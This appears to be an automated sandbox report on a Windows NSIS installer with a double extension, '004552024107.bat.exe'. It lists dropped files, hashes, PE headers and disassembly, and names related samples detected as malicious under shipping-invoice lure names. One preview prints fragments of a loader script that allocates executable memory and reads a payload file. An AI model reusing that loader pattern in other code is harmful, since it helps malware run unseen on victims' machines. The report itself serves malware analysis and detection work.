                                      SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                      MD5:12B140583E3273EE1F65016BECEA58C4
                                      SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                      SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                      SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                      Joe Sandbox View:
                                      • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                      • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                      • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                      • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                      • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                      • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                      • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                      • Filename: kZlAkx6fp7.exe, Detection: malicious, Browse
                                      • Filename: kZlAkx6fp7.exe, Detection: malicious, Browse
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.327532764383977
                                      Encrypted:false
                                      SSDEEP:48:qKNKyd+Z46pHT1wHsl9rEGbgPgVZShMmj3OPRYBA:5JSRzuHsxE4VH6O+i
                                      MD5:90228DD140188EC0CA02F7F52E4C9A30
                                      SHA1:6880D9AEEC4C97C4B7718044C9C59B92379FEACA
                                      SHA-256:54BCF3D018734B884BD33A74A05EEA0AC3C83501ACBDB71EA8EC56EC9402A263
                                      SHA-512:1A38B1EBB9E2440DD240C8CD2406261E21B544ED392F808D36F78590075F854D89E624589BFDDABCACE96B33A7F3084C7686351BD66AE07EC035BBEF94EF8DA2
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................|........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...X....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):6656
                                      Entropy (8bit):5.178709395875687
                                      Encrypted:false
                                      SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                                      MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                                      SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                                      SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                                      SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.163856189774724
                                      Encrypted:false
                                      SSDEEP:3:+gMn:8
                                      MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                                      SHA1:61DC848DD725DB72746E332D040A032C726C9816
                                      SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                                      SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                                      Malicious:false
                                      Preview:[Caps]..Setting=Enabled..
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3011
                                      Entropy (8bit):4.875614577841428
                                      Encrypted:false
                                      SSDEEP:48:Sl+lWlUMDNbr6641SO9Agz4x2qEtyTgz0gWP5CZ9sam0uxKKhY7SDEf:W+lLMDNbr6641S0z4xFEITggV+9zXa3Q
                                      MD5:6103DF2AF52F53D95AF61664D1866FFE
                                      SHA1:6AD99D4586667B497725EEC01AE0A772C441C1D4
                                      SHA-256:6AA446B014371D8DD9EF43D2A103E9CA8A0F61A3AFC4676BFC63AD07C1977C7E
                                      SHA-512:2AFA117DD3ACB8B695FFBC0F236E8B87F1DD4A7EAFD79A26CB4F191EED76DEBA7CBB106F3E78218769581C014840D039A4E173340CA0D6C2D2DFF0B5C5138096
                                      Malicious:false
                                      Preview:...W..n......t......b.5..Cb....&.................:....Q........x.i..../........h....x.`......(...D..x`...........'...M..z..v.........J.;...3...B.......#..s.._......p....q.,.t..........J.............................5...W.;B...G......._.............G.".3...mi..9.=..4.......V........7......@..o.1..n...u......9............=........D...........=.........y..).............Q.q................zG....O.0.}C...@......8.9bg.M...<........r......!Y.J.......A..........;.R............3..\...4.....N.2.X.i.......'.s..0....7....<...6.<......~..........).>..]...;....I...........:...R.....Lg....v..8............m.................T.$......ry5.5......A............M.............p..k..........2...~.k......................Y.Y`...}.....f.......8.PE........m...:.......a~......l-8..P..z..%.0.....]..L:.....E....?9.1.......;...E.....|...t.....n................vH.....u.................Q.<.Y....8......r.v............7........,1....Z.....c..6.G.....xc..j...8.H~....#.........F.,.......{-.VQ..6.v..u..f.....$.
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3794
                                      Entropy (8bit):4.876163305802233
                                      Encrypted:false
                                      SSDEEP:96:LnmpgKl8MI0hs4Qnu6lgB+EQFO+trNMgUIkR:7UpaMI34iu6eBdwO+8rIkR
                                      MD5:0629DF955F60990975A3C8EF199B57E9
                                      SHA1:FE57FA7FDF44B6E789A760C5292FD8DAE221187B
                                      SHA-256:499908BD96C7F2D9BC0F94433CC14C482C002C07A09DF0D73AF45BC17C4DA70B
                                      SHA-512:753EB2360926F32A6ED70E034FEAA57D6274756C3CE60914A4A1EC12DC07ACAC92C7906E3FE48A76F74BBEFBE8EAC023D352D11A087F47DEE9BD0ACBB59331F8
                                      Malicious:false
                                      Preview:.s............W?...T.7.h....~..2....4....`...Z....n..,.....L#.<....`j......U.................l...n.....................j......_...!/...........A........-.......Tk.................W......wv.4.N.....................>....n.T....OP.....%..e..."....,...]U...R. ..4.1k..........3J.%......d.....W............~..z...`........p......~D.....o..[...ib.......C......A..........%.....{.......W.r...............f...h....<...........~.......9.#.......0B>..o..*............,....p........T....J...]Y.S .........#.............................z......3..........{....H....p......v......V..F......,U..=.......R......Q.._.-4........,1...0.............v...z.............2<g.......;....!........g..d.1......d.J-......E.q......,.+...>.4eh...|T.:....B.......C........U......?.>..7.....h.....:...."..!..........6..........................B.@D.W.....8..............t..H.h............................S...h.....x....5......c."...................Q>.....2.5...)....%......T.....v........;1.......x.'.D.....y=.......O........
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3861
                                      Entropy (8bit):4.8950653795254695
                                      Encrypted:false
                                      SSDEEP:96:GKEfl8Ry/OyCvfcyh5ph9whBJQRaTYbEVr1wbd:MfObXc2h9iQUDZ1y
                                      MD5:2B5A33F2637CE6016495BE603413514E
                                      SHA1:571279989D47FF42C2974CDEDEA4C872CB9424CF
                                      SHA-256:46F41A0D8B9B891702F9ED2FB60FF737A2275011882501155B710EF9BA8577C7
                                      SHA-512:F55FE759C0DF2E8B9E38962E386BEB468FD4442714233F5A5DD13CA10647411FD62D966D8363FE50568F15525EEE815493AEDEF112A6FA6FA0B506A97AF21CF6
                                      Malicious:false
                                      Preview:.N..........b..Q...G..p.1...;...f._......X.........+..................1r.ES...9...~..C...?B...........IpF........0.......3...............S.......w..>?...$.....J...q..............K..................l........................;.......!.....................I.:..................S......4..kZ.../..................d.......a..............cs....9.......l......(....h.....F..'.V..........}..&C.;U..........._...............N..#.V...................:..".............j...?.....K...H.....s................._....L...1.....Z..L........."..........J.......1......`.......1..........@.y.......6...P...]....Z..........................Ob.....L.....U..cZ..n.CXq.........0...q.......K..........U...K....@/..|.......... ..|......pN.E......................>......?..Z=k....<............S......p.<..3..........1o.......Il.....3.y.................2....(.!.i(XC...b...Le..`.........@............*........=.....=v.=.'..>.............?........].Y..m........."$^L..^A...u......O....K9.3.......................;uG..*.
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3435
                                      Entropy (8bit):4.910328234136937
                                      Encrypted:false
                                      SSDEEP:48:P/sA7KBdAWdry+HEnrwU7j9mS/QwZ/kQMlzuVm+aAIBzx396upw/QAa/rl0:sA70/BEwy9D/XDVtIBzx3oupIa/6
                                      MD5:4A27BE5B33E9690FFCC4087DE6B78DE1
                                      SHA1:808A634035F94A20441F52F413777897DFD7D3E0
                                      SHA-256:CA6742E9E11A6E3008BAE84674451A7228E0E79F53A34235269984EFAE996C72
                                      SHA-512:6D4114A7DCF410C531465AEE6802A3A0A965864DD4AE65E304188931D17C394B3A700DA6558CCB2BF37AA99906D34A1E38E7CF62E655A6E2EAC3E5CDC38449E9
                                      Malicious:false
                                      Preview:.*.....G.[..........*Wd......^..................;{..+........o..a.....g..2......BN...........m`..{...g..k..(..........Z.s...Z....|.`.$....u..m..@.b.h.........n[.q...!.....(B.C..........4KC..................v.......[.q.i.......ug...g...E.....A..[..o38..........N.^.......y.p.z....._.!..........<.,..I.Y..G................._....;\.&........\.....bu..>...........=...r..y...}....`|7.......w...2...........*od.C.......................... ....................ul._9.4<...~..........................e]...+.....i.......... _....................l...........z.u..2f...4...$.Pg................J............h...D.......R.3..........G!..w.r."..........{.JS8........O.P....m...'.......rS..........1..2....0.......+....M...0.....Y...:.*........Q....g.l.q......'.r$..........7............6.........o..2..5...........%.0...:.........G......................|............._...8.P...................|.......r...........M.......6~...B...g.d.........5....'...................3....Y...}.4L.DT,.....R..Ds....7.........
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1618
                                      Entropy (8bit):4.660461986408
                                      Encrypted:false
                                      SSDEEP:48:mV2wmwMfFEXBaoCpI1sCEVHQTtlgJtScnbhH7D:maNK/0IOQjgJhx
                                      MD5:5A5EB5C7789F88A3DCC3F79DB0AA1A49
                                      SHA1:E67C28DEF4C59F267095C50C6A571AB5B65A9D04
                                      SHA-256:3A7318B3E11D39D783BA8BCCCAD3541B6896A03B1533E4F189DFD1CCC2FF40CE
                                      SHA-512:9762CD2524E971CF672D8DD8F46F4E7EE3F0FF5D91D11801AECB135DF9FBA6FC93D5FCC131879C1D3A81F2734AC5D6E07016E6CEC131A5F51C54CFE0664D0238
                                      Malicious:false
                                      Preview:...b..>.P.....k.................`T...........-.8...$....#P...f..9%......Y.9....o............C...#...............O|......9......u.............e......D=.A...............x...c....5^..?....G..h.....'..........k....../............Bn........i........&..............5Q..4........@..C......7.;....t....5...............C..x..................H...@.....>.......9.h..c......3..9W..$......v.....~.........!.......Y...."X.....N..|......d....Z.[.......+j.....@xB..w..S.........N.............J......u...................n....x....'..R.n.;...=.H`............................3...c.e..F..C.....n.0n..).......Y...Z..0..I.Q...Y.......H-...W..Q......<.`......l.........".S...Mg.8...X.........0/........[..$.........R...p.k-......S....`.....................k.....@......L.8.$....\M..............>.l.................d...O............R....+.................g..x.....>..b......V-..w...../...8......G......Q..........}..G..............'....................v.......m.}:...I$...........".M...J........._*..{...........
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2322
                                      Entropy (8bit):4.685927571910316
                                      Encrypted:false
                                      SSDEEP:48:hKk/USLt/YV/KNG2/Jddel368ugS8jMMccq3mtjzlrNiNviupW9:hb/USL1YV/K/TdeQ8jMMcYn3Opq
                                      MD5:C4A322BD2B1B0FD5130E2119EBE14A09
                                      SHA1:4C0F0F8AAC954E9D599F8C89B340F5C3C4742A6B
                                      SHA-256:063D6E2970210F7A4C74FE744AD76E71650AB5CB974EE4A9AF2BF446D6B2B3BF
                                      SHA-512:64FCE5DC8E510DCCAEA30E2BDB0671C706CECFB4AEC19ECD5B6326E4EE4B1B33A422E917A522F0CFCA184007ABE2B9D89EA401757A637D8D3DFA4B156E58A04A
                                      Malicious:false
                                      Preview:..e..k......Dh........=........z...W...m5K...0...R....4:.L....p.........-.......>...`..#.^.......>...d.d..7..........E...5N...@.......................K......:.o........t....... ......;....e.....R............>......,..&.|...................l+..e....q..Cf....U|..I.X.....U..e.G.....f.........&.......A....................9..}....E...............~.....9...q......T...G.....( ..t..x.......y......[.........Hh....GC9...........Q......C..N..Qt.~.......x.....L.......1.............................T..........V....6.....Ajt..@.....?...............$X.......m.n..........,.U......7.......X.................V........W......\P..............PE.....w......F....:.'9H....;eB.....{+.{.J....s........F....:......X..k.........../.......?.Z..+.....>.F..`1T....2.3.I7...`..{....k.u......b.......J+D...........Y8..y......UU...............3./...... .....[........]N6...y.e.........H..............m...........\.........V..[........W...&.U..........2..r....C....U.3....?...~....Wz......W.....|.C.......a,............
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2438
                                      Entropy (8bit):4.834166284053989
                                      Encrypted:false
                                      SSDEEP:48:QMQ2WErZ2pGC24S3HorZ9JAGA8jkcrbs1DHkkkIq/iSlcHKMVi:X59ys3HorNAGArcr2c/WKWi
                                      MD5:6C88CA43B6FA2E51F1BE781CDF1A7C3E
                                      SHA1:85E53052FFFD4D9AB7FD255A39628FB9D9A4C57D
                                      SHA-256:87747776DBB97E3892F3B4FE2507A907737E3E01F94F88B0D0ED7D849EFD31CF
                                      SHA-512:4B12F969637C61A8F6E1EF79DB3D54DC076672E35B1F67B9742F3B99A38F933298E2DB262A5DB487E281B85BF37FF74FB036E5C5AA3D6844B2D8AC0937B0F483
                                      Malicious:false
                                      Preview:...-....?..A..d.Z..............!.........\..j+.\...E.C..0.6........3.......K....E.....x....g..l.A............Ic........)P.7e.?.......v...|...Q.....h..<.....>........v6.=..;....@...............8,.........W....4.w... ..y......n._...L.IFr.....N...w...U..........H...%.......)......n..<K...:.........o...x..<........0....I...!&.......<.....p..._...........s.......L.......O...F...........p.......c..c.........%.]........X.........-......X.....{.x........^."...x...N....,..........1......)WD.+.[........?P..........4....6...........Z.B............R....;.....e.(.....7...}.........P....3...7B.....(...................................$........O.-"...k....]..........]....F.)...........)......v.....^..Q.......f}......!....0.........=........................m...........A....Q...(w...a......J3...U.n....\0...M..)......Y.....P..#...........p..R........N..^...R.............'.{.............y....g.....^L.......X.............t=z...VP..|.........l..E.-..(..F.....q..I....p..N\.......S.....f1.......4.
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3194
                                      Entropy (8bit):4.87998401204962
                                      Encrypted:false
                                      SSDEEP:48:rpEyDeY5QtYx201GaEtVnQvy5Dv6Z3JIV50tFh1FrDopL0AHmEMAaovQIS+GO/m+:fDeATGaETkd5J8e51xMYOey/mgRbP
                                      MD5:73DC0D944FBB5219CEDD966AF6EBB2C8
                                      SHA1:24D17D23C94CFC76FEF577CAF82C6D45B6125591
                                      SHA-256:3C2F20CCCBB8EEC2F5B2A70E44EC1631BFC8070C2F5A9198F1096563A8D0FA52
                                      SHA-512:72FE2BEEAFE7F5296FA346947E0BE3824B934545A299BFCB4AEBA9BD095AA7A2756E42C9D88E5DDDD072C931D35075AED7C7D4E3B641F74A62C96E150C573E4F
                                      Malicious:false
                                      Preview:........F...........].....<.~......d.............Y..1t...o...(...XA...~.h.qE-...KY..........F{....X............E)....x...R}......$$.}..6.......h+...9&.....c.....+.f..d........!.C....E.z../.....MZ............g.......\..?....@.....s..k.P}......$.<...........aE....!q.........*..e.V.q.b..Ui.R..>.h..R.F...........jM.W..G...^.l.....%.........D......*.v.P.=....s<.....D".....0.).$...B......+..*.B......N..o....o../....z..................G..............%..L..Y.....r.B.Zn..I...x...f.............)....6........?..............."..............'....-......G.................x..C...............t....`.................Q.a....}....e...................i.............0.q.....G..#......t....../]..hH.(......C.Y.z4...y........T..E...E....3....i....._........>.?.p...e....y..)?...o..i....5...S.$.....,.............\.......)..u.........8............p..\......... .........3...9....t...._..o......#U...r0..................g..............n.....d.....b....qE...............4..%..j..0Y.P......(.z...........R<C....
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):19688
                                      Entropy (8bit):4.57419794786777
                                      Encrypted:false
                                      SSDEEP:384:9mEn22k3XHa6wRTaW/Xm0FWEvUa/l30tg1QLaQ5C5oqfAYCbMxR6+qXC:Bn2EhIWfmeWEv710tu4aQU5PAbURNqXC
                                      MD5:273CDC09B4C6F6FC62AEED137F930215
                                      SHA1:A0827F97608DD238378B778E78856702ED0D10DD
                                      SHA-256:956F72DE5BA50373A0874BC6E1C0A384F577717A714AB2DFB7E8BBF92ED17948
                                      SHA-512:AB719201B05FEAF1CDF80CF7401881BEF7B3CA10099F3CEC56564AC138646F7F18F4E2168B7A126A7D1D17B13A5A2364DF40E9803C2BE45AD6BD6B68282AAE48
                                      Malicious:false
                                      Preview:..............EE............jj......s...cc."""........0.........p.......C.........PP...........k..`e...r...n...e.+.l...3...2...:...:...C...r.'.e...a...t...e...F...i...l.;.e...A...(...m... ...r...4.4. ...,... .>>i... ...0..)x..&8...0...0..%0...0..!0..60.b.0...,... ...i... ...0.}.,... .''p... ...0.EE,... ...i..m ...4...,... ...i... ..z0...x...8...0...,... ...i... ...0...)...i.......r...8...q...k...e...r...n...e...l.WW3...2...:..@:...S...e.==t...F..Ji...l..Ue...P.G.o...i.u.n...t...e...r..v(...i... ..fr...8...,... ...i..L ...2...3...0...1.xx2... ..d,.%. .2.i... ...0...,...i... ...0...)..)i.......r...4...q...k...e...r...n.AAe.v.l...3...2...:...:...V...i...r...t...u...a..tl..sA...l...l...o...c...(...i.]. ...0.1.,...i... ...6._.0...5...6...7...5...5...2...,... ...i... ...0.E.x...3...0..q0...0...,... ...i.&. ...0...x.C.4...0...)...p.......r...2.h.q...k...e...r...n...e...l...3...2...:...:...R..+e...a...d...F...i...l...e...(...i..> ...r..#8...,... ...i... ...r...2...,... ...i... ...6...0...5...6
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):285616
                                      Entropy (8bit):7.475859044066169
                                      Encrypted:false
                                      SSDEEP:6144:69KjF+6cBI3TtysXA/6esHSNP0hhOcAC7MCUIR/TSyZE64Rs6h:F+23TtysXAyesyChaC4CUq/ewE6as6h
                                      MD5:CEFA658707E7A791B2B511C9EA49B3D4
                                      SHA1:E11BCC2D8C7420ABA072F8D1A621C42E0F7C57D6
                                      SHA-256:BEEDB3FC08045986A4DFEBCD65167B07DF7F0F457647CC02EF186E0A865198FF
                                      SHA-512:A30EA178CEA14E837F52ACC2A966C77FB78B2D9090CE981A58943CABF5E72C0899BAABBF8B05E08A858A9D3034B7C63F87288CEDEC8378C862002EBF6735E0E2
                                      Malicious:false
                                      Preview:.....J.m...............`.IIIII................)..Q..xxx...J.................mmm..Q...................r....n...kk...i..))).f.DDDDDDDD.?.......//........||................`..@.........PPP.......MMMM...........>.........=..L..................@@.[[[[[.??....bbbbbbbbb..........BB.........ooo.......E...#.............................................C...$$............3.......a...................EEE.....@@....2.....V..+++.................Z.......,..].....00.......[.....SSSSSS..........[......t./........................``...........=.4444...........x..//.........................................................^^.ccc................W.........55.-...J.PP.............................j....:............bbb....OO..........p..............qq.8.Q..s........'......................................[.b....gg.....2.............RRR................22......4..................v.......................VV.......@.R............................MMM...........###......O.....................(....$.................?......
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):434
                                      Entropy (8bit):4.287029634434794
                                      Encrypted:false
                                      SSDEEP:12:THnAEO/X/lz5Qxq70QPiETlsieWr5hmhAZYOua3Jy6:kt5CqtPT7rUk3f
                                      MD5:D831A4A6C7B8B672C51DC73C42BF1B99
                                      SHA1:2EFA4039C5CBBE38D45B65CFCD8CB283B0B00F6F
                                      SHA-256:57B3854CDF7B15EB58BFD24E92F41E8B4A513F9A413E7981891B71F5BD56F4B8
                                      SHA-512:D5920BC02B61C18C83CE48D41AE1777F50685766A60CCB6C53161B25E3AFB34A1DDB0E8710C37E3B8B050F772E3EAB3A65FB4ACB093AEFD55AA2FDA74EC6C8F7
                                      Malicious:false
                                      Preview:chertier urduet extrabronchial foruroliger weakliest digesters glansbillederne weretiger superinfiniteness halisteretic udkommentere snowbourn gldstninger..resknderens landhandler ujvnheds rankerne rykkedes,kosos skabelseshistoriens sklves newsmagazine,timberman civilists expection unlowered agrostology landsplanlgnings stereoisomerism.parablen pachydermatoid jumpsuits kraftens estraden.misocapnic blygraa perirraniai flaskebakker,
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.479739164331005
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:004552024107.bat.exe
                                      File size:530'814 bytes
                                      MD5:2d40c2aefef620e7fb177f0cf24d8ea5
                                      SHA1:d4b00320d6be1ecac0fc016f1ad85a9774c14f47
                                      SHA256:576421830912fcb3f31f2721cb30607a7c07887a1558a80b626e0d9527467399
                                      SHA512:64e27276ffd6c44ac9572f0aed7367a004b8ee83e528518c607a39934329f54fac797b7c45e0dcc6c25c64b11fcb8b2f1ad21078ed4e3714ac61c0ba1e17fc70
                                      SSDEEP:12288:c19+dlfwYKZWegejzeusXEBS/PKPU6E0nn7+nJiPP:PdloYK7geveN0fPRnqnJi
                                      TLSH:0BB4DF13F723C8EBDA7D13F1A992C67B2EE415195DB1D0DDE3E5AE473000A262B09369
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@
                                      Icon Hash:eb9b9b2bbb9be371
                                      Entrypoint:0x4033d8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:671f2a1f8aee14d336bab98fea93d734
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000224h
                                      push esi
                                      push edi
                                      xor edi, edi
                                      push 00008001h
                                      mov dword ptr [ebp-14h], edi
                                      mov dword ptr [ebp-0Ch], 0040A188h
                                      mov dword ptr [ebp-08h], edi
                                      mov byte ptr [ebp-04h], 00000020h
                                      call dword ptr [0040809Ch]
                                      mov esi, dword ptr [004080A0h]
                                      lea eax, dword ptr [ebp-000000C4h]
                                      push eax
                                      mov dword ptr [ebp-000000B0h], edi
                                      mov dword ptr [ebp-30h], edi
                                      mov dword ptr [ebp-2Ch], edi
                                      mov dword ptr [ebp-000000C4h], 0000009Ch
                                      call esi
                                      test eax, eax
                                      jne 00007FC21864A071h
                                      lea eax, dword ptr [ebp-000000C4h]
                                      mov dword ptr [ebp-000000C4h], 00000094h
                                      push eax
                                      call esi
                                      cmp dword ptr [ebp-000000B4h], 02h
                                      jne 00007FC21864A05Ch
                                      movsx cx, byte ptr [ebp-000000A3h]
                                      mov al, byte ptr [ebp-000000B0h]
                                      sub ecx, 30h
                                      sub al, 53h
                                      mov byte ptr [ebp-2Ah], 00000004h
                                      neg al
                                      sbb eax, eax
                                      not eax
                                      and eax, ecx
                                      mov word ptr [ebp-30h], ax
                                      cmp dword ptr [ebp-000000B4h], 02h
                                      jnc 00007FC21864A054h
                                      and byte ptr [ebp-2Ah], 00000000h
                                      cmp byte ptr [ebp-000000AFh], 00000041h
                                      jl 00007FC21864A043h
                                      movsx ax, byte ptr [ebp-000000AFh]
                                      sub eax, 40h
                                      mov word ptr [ebp-30h], ax
                                      jmp 00007FC21864A036h
                                      mov word ptr [ebp-30h], di
                                      cmp dword ptr [ebp-000000C0h], 0Ah
                                      jnc 00007FC21864A03Ah
                                      and word ptr [ebp+00000000h], 0000h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x33c30.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x660c0x68003b90adcd2f1248db844446cb2ef15486False0.6663912259615384data6.411908920093797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x13400x1400b3bd9ad1bd1020c5cf4d51a4d7b61e07False0.4576171875data5.237673976044139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x251380x600c4e774255fea540ed5efa114edfa6420False0.4635416666666667data4.1635686587741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x300000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x430000x33c300x33e007fa7729fe4a0557bfedd7b90570ef402False0.497632718373494data6.34541536700329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x433880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.30904708387554714
                                      RT_ICON0x53bb00xb761PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867930557034827
                                      RT_ICON0x5f3180x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.3459112886272861
                                      RT_ICON0x687c00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.391913123844732
                                      RT_ICON0x6dc480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.4092465753424658
